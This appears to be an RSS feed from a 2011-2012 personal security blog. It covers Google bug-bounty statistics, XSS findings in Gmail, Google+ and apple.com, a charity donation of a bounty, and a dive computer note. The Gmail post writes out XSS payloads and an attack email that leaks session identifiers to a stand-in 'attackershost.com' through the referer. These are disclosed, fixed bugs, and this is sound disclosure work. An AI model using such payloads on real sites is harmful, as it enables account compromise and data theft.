<tr style="background-color: #fafafa;"><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">0x08</span></td><td class="name" style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top; width: 200px;"><span style="font-family: Arial, Helvetica, sans-serif;">Sergey Markov</span></td><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.google.com/about/appsecurity/hall-of-fame/" rel="nofollow" style="color: #7759ae; text-decoration: none;"></a></span></td><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">Russia</span></td></tr>  
<tr><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">0x09</span></td><td class="name" style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top; width: 200px;"><a href="https://twitter.com/NealPoole" target="_blank"><span style="font-family: Arial, Helvetica, sans-serif;">Neal Poole</span></a></td><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><a href="http://nealpoole.com/blog/" rel="nofollow" style="color: #7759ae; text-decoration: none;"><span style="font-family: Arial, Helvetica, sans-serif;"></span></a><a href="http://nealpoole.com/blog/">http://nealpoole.com/blog/</a></td><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">USA</span></td></tr>  
<tr style="background-color: #fafafa;"><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">0x0A</span></td><td class="name" style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top; width: 200px;"><span style="font-family: Arial, Helvetica, sans-serif;">Christian Liebig</span></td><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.google.com/about/appsecurity/hall-of-fame/" rel="nofollow" style="color: #7759ae; text-decoration: none;"></a></span></td><td style="border: 1px solid rgb(238, 238, 238); padding: 4px 12px; vertical-align: top;"><span style="font-family: Arial, Helvetica, sans-serif;">Germany</span></td></tr>  
</tbody></table>
<p>Google said that the ranking is influenced by volume, severity, recency and charity.</p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Cross-Site-Scripting in Google Mail]]></title><description><![CDATA[<p>In the last months I found several XSS vulnerabilities in Google&apos;s Gmail. All bugs are now fixed in a very short time. Currently Gmail has around 350 Mio. users and it&apos;s clear that Google taking a lot of efforts to protect their users.</p><ul><li>Safebrowsing</li><li>Google&apos;</li></ul>]]></description><link>https://www.nilsjuenemann.de/2012/06/11/cross-site-scripting-in-google-mail-html/</link><guid isPermaLink="false">63b16d87da1141cc2bec4650</guid><category><![CDATA[security]]></category><category><![CDATA[google]]></category><dc:creator><![CDATA[Nils Juenemann]]></dc:creator><pubDate>Mon, 11 Jun 2012 18:34:00 GMT</pubDate><content:encoded><![CDATA[<p>In the last months I found several XSS vulnerabilities in Google&apos;s Gmail. All bugs are now fixed in a very short time. Currently Gmail has around 350 Mio. users and it&apos;s clear that Google taking a lot of efforts to protect their users.</p><ul><li>Safebrowsing</li><li>Google&apos;s Security Tools</li><li>2-Step-Verification</li><li>Vulnerability Reward Program</li><li>warnings for suspected state-sponsored attacks</li><li>The Browser Security Handbook</li><li>Webmaster Tools warnings for hackable sites</li><li>Google+ with CSP evaluation</li></ul><p>Google shared some stats about the VRP last year and told that around <strong>65%</strong> of all reported bugs are <strong>XSS</strong>.</p><figure class="kg-card kg-image-card"><a href="https://docs.google.com/present/view?id=dfgb2455_20hnx2mdhh"><img src="https://3.bp.blogspot.com/-jDP35UnVDYc/T9SovEhRJzI/AAAAAAAAE-0/8nnAYlA1Qn4/s400/google-bugs-vrp.png" class="kg-image" alt="Google VRP stats" loading="lazy" title="Google VRP stats"></a></figure><p>And that statistics are completely true. Here my stats made with around 220 bugs:</p><figure class="kg-card kg-image-card"><a href="http://1.bp.blogspot.com/-ymZzU9ATphs/T9SovoFcz9I/AAAAAAAAE-4/fodIxfCk-I0/s1600/vrp-stats-nils.png"><img src="https://1.bp.blogspot.com/-ymZzU9ATphs/T9SovoFcz9I/AAAAAAAAE-4/fodIxfCk-I0/s400/vrp-stats-nils.png" class="kg-image" alt loading="lazy"></a></figure><p>So the numbers are nearly the same and I think every other company who develop web application has the same bug distribution and a much higher amount of bugs. Google has made a great job and compared with the amount of new features and new products, the relative frequency of security bugs is quite low.</p><p>Today I want to share 3 different XSS vulnerabilties in Google Gmail.</p><h3 id="persistent-dom-xss-innerhtml-in-gmails-mobile-view">Persistent DOM XSS (innerHTML) in Gmail&apos;s mobile view.</h3><p>A incoming mail containing <strong>&gt;&lt;img src=x onerror=prompt(1)&gt;</strong> within the subject and forwarded to another user, has lead to XSS.</p><p>That&apos;s a funny bug, because something went wrong while some engineers was working on a fix. For some hours every fowarded message contain</p><pre><code>//&#xA0;The body is already esacped
</code></pre><p>Oops!</p><figure class="kg-card kg-image-card"><img src="https://1.bp.blogspot.com/-5TTwJcDbYy0/T9SeNVCb2NI/AAAAAAAAE-Q/bilclcir_no/s590/xss-gmail-com-5.png" class="kg-image" alt="gmail xss" loading="lazy"></figure><h3 id="reflective-dom-xss-in-gmails-mobile-view">Reflective DOM XSS in Gmail&apos;s mobile view</h3><p><strong><a href="https://mail.google.com/mail/mu/#cv/search/%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E/foobar">https://mail.google.com/mail/mu/#cv/search/&quot;&gt;&lt;img src%3Dx onerror%3Dalert(2)&gt;/foobar</a></strong></p><p>That&apos;s all. Just a simple reflective XSS in the search feature for labels.</p><h3 id="persistent-xss-in-gmail">Persistent XSS in Gmail</h3><p>There are two ways to display a message directly:</p><ol><li><a href="https://mail.google.com/mail/u/0/?ui=2&amp;ik=293aded8ef&amp;view=om&amp;th=237da8dbcf05dac2">https://mail.google.com/mail/u/0/?ui=2&amp;ik=293aded8ef&amp;view=om&amp;th=237da8dbcf05dac2</a></li><li><a href="https://mail.google.com/mail/u/0/?ui=2&amp;ik=293aded8ef&amp;view=domraw&amp;th=237da8dbcf05dac2">https://mail.google.com/mail/u/0/?ui=2&amp;ik=293aded8ef&amp;view=domraw&amp;th=237da8dbcf05dac2</a></li></ol><p>The GET parameters:</p><ul><li><strong>ik</strong> - it&apos;s a static ID for that particular user</li><li><strong>view</strong> - representing the current view of Gmail</li><li><strong>th</strong> - message id</li></ul><p>The response of both requests was text/plain. With a special crafted URL it was possible to force a <strong>HTTP/1.1 500 Internal Server Error</strong> with some content lines of the message.</p><p>The Content-Type was then: <strong>text/html</strong>.</p><figure class="kg-card kg-image-card"><img src="https://3.bp.blogspot.com/-P_hd_HF414E/T9YAn_kmJ8I/AAAAAAAAE_4/tRd2Ef5KC-4/s640/xss-gmail-3.png" class="kg-image" alt="gmail xss" loading="lazy"></figure><p>But we still have a problem - an attacker doesn&apos;t know the <strong>ik</strong> and the <strong>message id</strong>. Without both values it&apos;s not possible to generate the special URL.</p><p>But it&apos;s easy to get both values through referer leaking. We have to send to our victim a HTML e-mail with that content:</p><pre><code>&lt;img src=&quot;https://attackershost.com/1x1.gif&quot;&gt;
&lt;a href=&quot;https://attackershost.com/gmailxss&quot;&gt;Click here to have fun&lt;/a&gt;
&lt;script&gt;alert(/xss/)&lt;/script&gt;
</code></pre><ul><li>the <strong>1x1.gif</strong> leakes the <strong>ik</strong> and the <strong>message id</strong> to <strong>attackershost.com</strong> (images were loaded in the print preview if the sender is a trusted mail source)</li><li>the link to <strong>attackershost.com/gmailxss</strong> has the same effect, leakes the referer by mouse click</li><li>and a <strong>alert(/xss/)</strong> _to demonstrate that&apos;s possible to run javascript in context of <strong>mail.google.com</strong></li></ul><figure class="kg-card kg-image-card"><img src="https://1.bp.blogspot.com/-LGsBB5ggWJI/T9X76ImAzLI/AAAAAAAAE_I/2LPqR6sunlA/s400/gmail-xss.png" class="kg-image" alt="gmail xss" loading="lazy"></figure><p>The Google Security Team took immediately actions and blocked the particular GET parameter on their frontends as intermediate fix with the message:</p><pre><code>We&apos;re sorry ... but your computer or network may be sending automated queries. To protect our users, we can&apos;t process your request right now.
</code></pre><figure class="kg-card kg-image-card"><img src="https://3.bp.blogspot.com/-Vrmg7Eiq9Xo/T9YAd4OofsI/AAAAAAAAE_w/lY2Wae89otY/s640/xss-gmail-4.png" class="kg-image" alt="warning" loading="lazy"></figure><p>If you want to read more about Google&apos;s VRP I recommend you the talk of Nir Goldshlager &quot;<a href="http://www.slideshare.net/goldshlager19/hes-2012-killing-a-bug-bounty-program-by-itzhak-zuk-avrahamnir-goldshlager">Killing a bug bounty program</a>&quot; or you can just read some of my older posts <a href="http://www.nilsjuenemann.de/2012/04/ethiopia-gets-new-school-thanks-to-xss.html">here</a>, <a href="http://www.nilsjuenemann.de/2011/11/xss-on-googlecom.html">here</a>, <a href="http://www.nilsjuenemann.de/2012/02/one-year-google-web-vulnerability.html">here</a> and <a href="http://www.nilsjuenemann.de/2011/06/hitb-interview-mit-adam-mein-und-chris.html">here</a>.</p><p>Any questions? Use the comments below the post.</p><p>PS: <a href="http://support.google.com/accounts/bin/answer.py?hl=en&amp;topic=1056283&amp;answer=185839">Enable 2-step-verification</a> for your Google account today to make your Gmail more secure.</p>]]></content:encoded></item><item><title><![CDATA[Ethiopia gets a new school - thanks to a XSS in Google+]]></title><description><![CDATA[<!--kg-card-begin: markdown--><p><strong>Update 04/29/12</strong>: This blog post leads to a persistent XSS bug within <a href="http://www.informationweek.com/influencer/security/616a45777252657276506c6830533652356a525737513d3d">InformationWeek.com</a><br>
&#xA0;<a href="https://4.bp.blogspot.com/-NpKxQ5ChexI/T51zKSp8pJI/AAAAAAAAEqE/a7olb4A8yUY/s1600/xss-information-week.png">(screenshot)</a>, because <a href="https://twitter.com/#!/0xcharlie">Charlie Miller</a> has <a href="https://twitter.com/#!/0xcharlie/status/196014895785967617">tweeted</a> about it. :-)<br>
&#xA0;<br>
<strong>Update 05/02/12</strong>: InformationWeek has fixed the issue.</p>
<p>I contribute to the Google Vulnerability Reward Program since November 2010 now and I</p>]]></description><link>https://www.nilsjuenemann.de/2012/04/26/ethiopia-gets-new-school-thanks-to-xss/</link><guid isPermaLink="false">63b16d4cda1141cc2bec4642</guid><category><![CDATA[security]]></category><category><![CDATA[google]]></category><dc:creator><![CDATA[Nils Juenemann]]></dc:creator><pubDate>Thu, 26 Apr 2012 21:22:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p><strong>Update 04/29/12</strong>: This blog post leads to a persistent XSS bug within <a href="http://www.informationweek.com/influencer/security/616a45777252657276506c6830533652356a525737513d3d">InformationWeek.com</a><br>
&#xA0;<a href="https://4.bp.blogspot.com/-NpKxQ5ChexI/T51zKSp8pJI/AAAAAAAAEqE/a7olb4A8yUY/s1600/xss-information-week.png">(screenshot)</a>, because <a href="https://twitter.com/#!/0xcharlie">Charlie Miller</a> has <a href="https://twitter.com/#!/0xcharlie/status/196014895785967617">tweeted</a> about it. :-)<br>
&#xA0;<br>
<strong>Update 05/02/12</strong>: InformationWeek has fixed the issue.</p>
<p>I contribute to the Google Vulnerability Reward Program since November 2010 now and I found a lot of security bugs in nearly all major Google applications.</p>
<p>This month I found two different <strong>persistent XSS</strong> vulnerabilities in <strong>Google+</strong>. One of these I want to disclose here because that bug hopefully makes the life of some childrens a bit better.</p>
<p>My testing Google+ profile is named</p>
<p><code>&quot;&gt;&lt;img src=x onerror=prompt(1)&gt;</code></p>
<p>If a users has more than 6 public photo albums the name wasn&apos;t escaped on the profile page.</p>
<p>The screenshot shows the bug in action.</p>
<p><img src="https://2.bp.blogspot.com/--NiTH3S-E7c/T5nMVI19X_I/AAAAAAAAEoA/QkT5WJFVSxU/s1600/xss-google-plus.png" alt="screenshot" loading="lazy"></p>
<p>The Google Security Team responded very fast and delivered a valid fix to production after some hours. For this vulnerability I got a reward of <strong>$1,000 USD</strong>.</p>
<p>From three other minor bugs I got <strong>$300 USD</strong>.</p>
<p>Some notes and background information about the threats of HTML injections can be found&#xA0;<a href="http://lcamtuf.coredump.cx/postxss/">here</a></p>
<p><img src="https://3.bp.blogspot.com/-FKqyaBLTcKQ/T5nQriBnRfI/AAAAAAAAEoU/NWFJ1BO4As0/s1600/reward-google-plus-xss.png" alt="reward" loading="lazy"></p>
<h3 id="i-decided-to-donate-all-the-money-to-a-school-project-in-welkite-ethiopia">I decided to donate all the money&#xA0;to a school project in&#xA0;Welkite&#xA0;(Ethiopia).</h3>
<p>From the Project Manager of&#xA0;<strong>Bessere Zukunft e.V</strong>.&#xA0;about that school:</p>
<blockquote>
<p>At this school there is a lack of fundamental supply with water, toilets and electricity. Because there are barely any educational books, school materials and furniture (see photos), sufficient school education isn&#x2019;t possible.<br>
Welkite is 180 km away from capital city Addis Ababa. At this elementary school approximately 750 children go to grade one to eight. The classrooms have not enough room and benches to sit for the 80 children per grade. Often four to five children have to share a seating bench. Most of the children have to walk 45 minutes to one hour to get to school. At this school there is no access to water, electricity and enough adequate toilets.</p>
</blockquote>
<p>If you decide to donate your money from Google to charity Google doubles the rewards! So I&apos;m able to donate <strong>$2,600 USD</strong> to this project.</p>
<p>Google has made the donation for me via <a href="http://www.betterplace.org/en/projects/2001-school-project-welkite-i-in-ethiopia-east-africa">Betterplace</a>.</p>
<p><img src="https://4.bp.blogspot.com/-HWv7CUdXJro/T5nS-WxgydI/AAAAAAAAEoc/DDX6cVn8LpE/s1600/donation-betterplace.png" alt="betterplace" loading="lazy"></p>
<p>There is another school project from <strong>Bessere Zukunft e.V</strong> in East Africa. Do you want to donate too? Do it <a href="http://www.betterplace.org/en/projects/4649-schulprojekt-welkite-ii-in-athiopien-ostafrika">here</a>.</p>
<p><img src="https://2.bp.blogspot.com/-UcpzeIobOiA/UQp2u6mELqI/AAAAAAAAHCo/u4V9xSOPpDU/s320/togo.jpeg" alt="kids" loading="lazy"></p>
<p>Thanks so much to the Google Security Team who made this possible!</p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[One year Google web vulnerability research]]></title><description><![CDATA[<!--kg-card-begin: markdown--><p>Adam Mein from the Google Security Team <a href="http://googleonlinesecurity.blogspot.com/2012/02/celebrating-one-year-of-web.html">shared today some stats</a> from the VRP of the last 12 months.</p>
<p>The facts about one year VRP: <strong>$429.000</strong> paid to around <strong>200 researcher</strong> for <strong>750</strong>qualifying bugs.</p>
<p>Roughly half of the bugs that received a reward were discovered in software written</p>]]></description><link>https://www.nilsjuenemann.de/2012/02/10/one_year_google_web_vulnerability_research/</link><guid isPermaLink="false">63b16d13da1141cc2bec4632</guid><category><![CDATA[security]]></category><category><![CDATA[google]]></category><dc:creator><![CDATA[Nils Juenemann]]></dc:creator><pubDate>Fri, 10 Feb 2012 14:49:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>Adam Mein from the Google Security Team <a href="http://googleonlinesecurity.blogspot.com/2012/02/celebrating-one-year-of-web.html">shared today some stats</a> from the VRP of the last 12 months.</p>
<p>The facts about one year VRP: <strong>$429.000</strong> paid to around <strong>200 researcher</strong> for <strong>750</strong>qualifying bugs.</p>
<p>Roughly half of the bugs that received a reward were discovered in software written by approximately <strong>50 companies</strong> that Google acquired.</p>
<p><img src="http://3.bp.blogspot.com/-Lw3xKAKj8IA/TzU5TIpoFqI/AAAAAAAADxY/l2Nsle1p_Vk/s320/google-gift.jpg" alt loading="lazy"></p>
<p>Adam <a href="https://docs.google.com/present/view?id=dfgb2455_20hnx2mdhh">told in 2011</a> that <strong>20%</strong> of people are responsible for around <strong>80%</strong> of all bugs.</p>
<p>Here some reports from researchers who participate in the VRP:</p>
<ul>
<li><a href="http://www.thetestmanager.com/blog/2011/03/20/google-security-reward-program-honorable-mention/">XSS iGoogle, XSS Google Translate</a></li>
<li><a href="http://www.cloudscan.me/2011/12/googlecom-xss-resolved-captcha-form.html">XSS Recaptcha</a></li>
<li><a href="http://esploit.blogspot.com/2011/02/google-vulnerability-reward-program-xss.html">Reflected DOM based XSS Google Code</a></li>
<li><a href="http://spareclockcycles.org/2011/02/03/google-analytics-xss-vulnerability/">XSS Google Analytics</a></li>
<li><a href="http://benhayak.blogspot.com/2011/03/google-security-vulnerability-reward.html">XSS Google Adwords</a>&#xA0;(1)</li>
<li><a href="http://h.ackack.net/google-adwords-xsses.html">XSS Google Adwords</a> (2)</li>
<li><a href="https://nealpoole.com/blog/2011/04/google-vulnerability-reward-program-persistent-xss-in-google-support-forum/">XSS Google Webmaster Support Forum</a></li>
<li><a href="https://nealpoole.com/blog/2011/03/google-vulnerability-reward-program-jaiku-persistent-xss/">XSS Jaiku</a></li>
<li><a href="https://nealpoole.com/blog/2011/02/google-vulnerability-reward-program-non-persistent-xss-in-aardvark/">XSS Aardvark</a></li>
<li><a href="https://nealpoole.com/blog/2011/02/google-vulnerability-reward-program-persistent-xss-in-blogger-design-preview/">XSS Blogger.com</a></li>
<li><a href="https://nealpoole.com/blog/2011/02/google-vulnerability-reward-program-xss-vulnerability-in-google-code-static-html/">XSS Google Code</a></li>
<li><a href="https://nealpoole.com/blog/2011/01/google-vulnerability-reward-program-feedburner-csrf/">CSRF Google Feedburner</a></li>
<li><a href="http://jon.oberheide.org/blog/2011/03/07/how-i-almost-won-pwn2own-via-xss/">XSS Android Market</a></li>
<li><a href="http://benhayak.blogspot.com/2011/02/google-security-vulnerability-reward_27.html">XSS Google Website Optimizer</a></li>
<li><a href="http://www.xboxmb.com/forum/28-milestones-achievements/96569-%5Bxss%5Dgoogle-xss-hall-fame-$1000-reward.html">XSS accounts.youtube.com</a></li>
<li><a href="http://www.cloudscan.me/2011/08/pixelinvitemediacom-google.html">XSS Invitemedia</a></li>
<li><a href="http://secalert.net/post.php?id=43">XSS Google Calendar (german)</a></li>
<li><a href="https://twitter.com/#!/kinugawamasato/status/88780151114043392">Masato Kinugawa ($30.000 Tweet)</a></li>
<li><a href="http://www.nirgoldshlager.com/2011/03/blogger-get-administrator-privilege-on.html">Gain Blogger.com Administrator Priviledge</a></li>
</ul>
<p>My personal stats about one year VRP can be found <a href="http://www.nilsjuenemann.de/2011/11/09/xss-on-google-com/">here</a>.</p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[ICON HD Tank Module Pairing]]></title><description><![CDATA[<!--kg-card-begin: markdown--><p>After many hours reading different versions of manuals I found out, that&apos;s not possible to perform a pairing operation between <a href="http://www.mares.com/products/computers/air-integrated-computers/icon-hd-net-ready/4223/?region=eu">Icon HD</a> Tank Module and the computer without pressure on a tank.</p>
<p><img src="https://4.bp.blogspot.com/-bt3nCfzEh7M/TuUdzAoAlPI/AAAAAAAADLY/Shgjwmivek0/s320/iconhd.png" alt="icon" loading="lazy"></p>
<p>The hint that&apos;s the manual is wrong is inside the <a href="http://www.mares.com/common/__/5621.06df8c55.dl">Erate Corrige</a>:</p>
<blockquote>
<p>In Section</p></blockquote>]]></description><link>https://www.nilsjuenemann.de/2011/12/11/icon-hd-tank-module-pairing/</link><guid isPermaLink="false">63b16cd8da1141cc2bec4625</guid><category><![CDATA[random]]></category><dc:creator><![CDATA[Nils Juenemann]]></dc:creator><pubDate>Sun, 11 Dec 2011 20:02:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>After many hours reading different versions of manuals I found out, that&apos;s not possible to perform a pairing operation between <a href="http://www.mares.com/products/computers/air-integrated-computers/icon-hd-net-ready/4223/?region=eu">Icon HD</a> Tank Module and the computer without pressure on a tank.</p>
<p><img src="https://4.bp.blogspot.com/-bt3nCfzEh7M/TuUdzAoAlPI/AAAAAAAADLY/Shgjwmivek0/s320/iconhd.png" alt="icon" loading="lazy"></p>
<p>The hint that&apos;s the manual is wrong is inside the <a href="http://www.mares.com/common/__/5621.06df8c55.dl">Erate Corrige</a>:</p>
<blockquote>
<p>In Section 1.8 it is mentioned that the tank module does not need to be mounted on a regulator first stage. This is incorrect. To perform the pairing operation, the tank module must be pressurized to at least 15bar/220psi. Hence it must be mounted on a first stage regulator, which is itself mounted on a full scuba tank and the valve opened.</p>
</blockquote>
<p>Hopefully the battery of the Tank Module is full and I&apos;m able to pair both devices tomorrow at&#xA0;<a href="http://www.helengeli.net/">Helengeli Island.</a></p>
<p>Key Features of ICON HD:</p>
<ul>
<li>Max depth 150m</li>
<li>Digital compass</li>
<li>Decompression model: RGBM Mares - Wienke (10 tissues)</li>
<li>Extended display</li>
<li>Wide screen for superior readability</li>
<li>Digital descent/ascent speed indicator</li>
<li>Air integrated (Tank pressure, breathing rate)</li>
<li>Nitrox with option to use up to 3 different mixes</li>
<li>Bottom Time/Gauge with stopwatch</li>
<li>Seabed map available during dive</li>
<li>USB interface to PC</li>
<li>Temperature measurement</li>
<li>Logbook for 100 dives</li>
</ul>
<p>It&apos;s my first dive computer and I think it&apos;s currently one of the best dive computers for divers who wants to enjoy a secure dive.</p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Apple.com XSS Gallery]]></title><description><![CDATA[<!--kg-card-begin: markdown--><p>In the past I&apos;ve reported a lot of security bugs to Google&#xA0;(you find <a href="http://www.nilsjuenemann.de/2011/11/09/xss-on-google-com/">here</a> some stats about the last year) and three months ago I&apos;ve found in just one night a lot of reflective XSS bugs on different apple.com sites.</p>
<p>If I try</p>]]></description><link>https://www.nilsjuenemann.de/2011/11/11/apple-com-xss-gallery/</link><guid isPermaLink="false">63b16c91da1141cc2bec4616</guid><category><![CDATA[security]]></category><category><![CDATA[apple]]></category><dc:creator><![CDATA[Nils Juenemann]]></dc:creator><pubDate>Fri, 11 Nov 2011 10:23:00 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><p>In the past I&apos;ve reported a lot of security bugs to Google&#xA0;(you find <a href="http://www.nilsjuenemann.de/2011/11/09/xss-on-google-com/">here</a> some stats about the last year) and three months ago I&apos;ve found in just one night a lot of reflective XSS bugs on different apple.com sites.</p>
<p>If I try to compare both security team, I feel with Google much more comfortable to communicate. Apple is slow in the first response, didn&apos;t told me that a bug is fixed and I had to report some bugs twice to get a confirmation that they started working on it.</p>
<p>Compared to other companies Apple has a lot of deprecated (?) legacy applications running. It looks like a&#xA0;mingle-mangle of different programming languages, application servers, domains or hostnames and independently running services - with a lot of bugs.</p>
<p>Did you know, that Apple has a credit page&#xA0;who have reported potential security issues? They call it <a href="https://support.apple.com/en-us/HT201536">Apple Webserver Notifications</a>.</p>
<p><strong>Update</strong>: Here a explanation from OWASP&#xA0;what XSS is.</p>
<blockquote>
<p>Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.</p>
</blockquote>
<p>So, here we go with the XSS Gallery:</p>
<h5 id="discussionsapplecom">discussions.apple.com</h5>
<p><img src="https://1.bp.blogspot.com/-C5PaUSJxzBA/Tr0FS7nNH0I/AAAAAAAADEU/YoDWUMcR0JA/s400/Bildschirmfoto+2011-08-17+um+13.50.17.png" alt loading="lazy"></p>
<h5 id="wwwapplecom">www.apple.com</h5>
<p><img src="https://3.bp.blogspot.com/-84aA00jOLzA/Tr0FTesS2EI/AAAAAAAADEg/enniQ3gRJU0/s400/Bildschirmfoto+2011-08-08+um+14.35.59.png" alt loading="lazy"></p>
<h5 id="developerapplecom">developer.apple.com</h5>
<p><img src="https://3.bp.blogspot.com/-B1ADv2AnR3c/Tr0FVQS-78I/AAAAAAAADE0/_SMhSD4fiMI/s400/Bildschirmfoto+2011-08-08+um+14.31.56.png" alt loading="lazy"></p>
<h5 id="listsapplecom">lists.apple.com</h5>
<p><img src="https://4.bp.blogspot.com/-LK6HfbFzxsk/Tr0FWYuF3ZI/AAAAAAAADFE/Zt6QIPwIzmI/s400/Bildschirmfoto+2011-08-08+um+14.31.15.png" alt loading="lazy"></p>
<h5 id="supportapplecom">support.apple.com</h5>
<p><img src="https://1.bp.blogspot.com/-2OE446XDBHU/Tr0FW5UeTUI/AAAAAAAADFM/V2XDemKBJi0/s400/Bildschirmfoto+2011-08-08+um+14.30.55.png" alt loading="lazy"></p>
<h5 id="backenendmediaeuroapplecom">backenend.media.euro.apple.com</h5>
<p><img src="https://1.bp.blogspot.com/-noUU9RLPHR0/Tr0FYaLaW6I/AAAAAAAADFg/pwnj6eSr0ic/s400/Bildschirmfoto+2011-08-08+um+14.29.38.png" alt loading="lazy"></p>
<h5 id="canadaeduapplecom">canadaedu.apple.com</h5>
<p><img src="https://1.bp.blogspot.com/-AA0KV20Ifxw/Tr0FSXW5lnI/AAAAAAAADEQ/A_kBROHAClY/s400/Bildschirmfoto+2011-08-17+um+13.50.55.png" alt loading="lazy"></p>
<h5 id="canadaeduapplecom">canadaedu.apple.com</h5>
<p><img src="https://1.bp.blogspot.com/-AA0KV20Ifxw/Tr0FSXW5lnI/AAAAAAAADEQ/A_kBROHAClY/s400/Bildschirmfoto+2011-08-17+um+13.50.55.png" alt loading="lazy"></p>
<h5 id="qtdevseedapplecom">qtdevseed.apple.com</h5>
<p><img src="https://3.bp.blogspot.com/-FfKUOkoOI-M/Tr0FUunc0hI/AAAAAAAADEw/eWJRHQ40hzA/s400/Bildschirmfoto+2011-08-08+um+14.32.26.png" alt loading="lazy"></p>
<!--kg-card-end: markdown-->]]></content:encoded></item></channel></rss>